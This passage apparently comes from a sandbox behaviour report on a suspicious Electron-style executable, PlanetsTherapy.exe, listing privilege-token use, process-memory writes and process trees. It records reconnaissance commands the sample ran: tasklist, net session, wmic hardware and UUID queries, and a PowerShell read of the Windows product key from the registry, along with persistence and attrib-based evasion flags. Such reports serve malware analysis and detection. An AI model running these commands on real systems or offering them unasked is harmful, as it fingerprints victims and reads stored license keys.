N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5076 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 5076 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 448 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 448 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 4872 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4872 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1528 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 812 wrote to memory of 4088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 812 wrote to memory of 4088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2916 wrote to memory of 4508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2916 wrote to memory of 4508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1528 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe

"C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe"

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

"C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1656 --field-trial-handle=1716,12545588271907103077,18284286920533148989,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=5076 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=5076 get ExecutablePath

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

"C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1948 --field-trial-handle=1716,12545588271907103077,18284286920533148989,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net.exe

net session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

